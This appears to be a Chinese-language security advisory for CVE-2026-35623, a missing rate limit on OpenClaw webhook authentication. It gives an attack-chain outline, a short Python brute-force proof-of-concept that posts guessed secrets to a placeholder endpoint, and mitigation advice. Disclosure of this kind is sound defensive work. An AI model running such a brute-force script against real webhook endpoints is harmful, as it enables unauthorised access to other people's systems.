CVE-2026-35623 CVSS 4.8 中危

CVE-2026-35623 OpenClaw Webhook认证暴力破解漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35623

漏洞类型

暴力破解

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 在 2026.3.25 之前的版本中存在安全漏洞，其 Webhook 身份验证机制缺少速率限制。这使得远程攻击者能够无限制地尝试猜测密码，从而通过暴力破解方式绕过认证。攻击者可以利用此漏洞获取未授权的系统访问权限，危及数据机密性和完整性。该漏洞 CVSS 评分为 4.8，属于中危级别。

技术细节

该漏洞的根源在于 OpenClaw 的 Webhook 认证模块未实施有效的请求频率限制策略。在标准的 Web 应用安全实践中，为防止暴力破解，系统必须对认证失败次数进行监控和拦截。然而，在受影响版本中，攻击者可以利用自动化脚本向 Webhook 端点发送高频的认证请求，而系统不会触发任何锁定或延迟机制。如果管理员设置的 Webhook 密码强度较弱，攻击者即可在短时间内通过字典攻击成功破解密码。一旦获取有效凭证，攻击者即可接管 Webhook 功能，执行未授权操作或泄露敏感信息。

攻击链分析

STEP 1

信息收集

攻击者识别目标 OpenClaw 实例的 Webhook 端点 URL。

STEP 2

暴力破解

攻击者利用脚本，在无速率限制的情况下，向 Webhook 端点发送大量带有不同密码猜测的请求。

STEP 3

凭证获取

当服务器返回成功的 HTTP 状态码（如 200 OK）时，攻击者确认了正确的 Webhook 密码。

STEP 4

未授权访问

攻击者使用获取的凭证访问 Webhook，执行恶意操作或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target-ip:port/webhook/endpoint"
password_list = ["admin", "password", "123456", "secret"]

headers = {
    "Content-Type": "application/json"
}

# Brute-force loop
for password in password_list:
    # Example payload structure, adjust based on actual OpenClaw implementation
    payload = {
        "secret": password,
        "data": "test_payload"
    }
    
    try:
        response = requests.post(target_url, json=payload, headers=headers, timeout=5)
        
        # Check for successful authentication indicators (e.g., HTTP 200 OK)
        if response.status_code == 200:
            print(f"[+] Password found: {password}")
            print(f"[+] Response: {response.text}")
            break
        else:
            print(f"[-] Failed attempt with password: {password}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Connection error: {e}")

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施

建议立即将 OpenClaw 升级到修复了该漏洞的 2026.3.25 版本。如果暂时无法升级，应在反向代理或防火墙层面针对 Webhook 接口配置严格的速率限制规则，例如限制单个 IP 每分钟的请求数。同时，务必检查并更换当前使用的 Webhook 密码，确保新密码具有足够的复杂度和长度，以抵御暴力破解攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表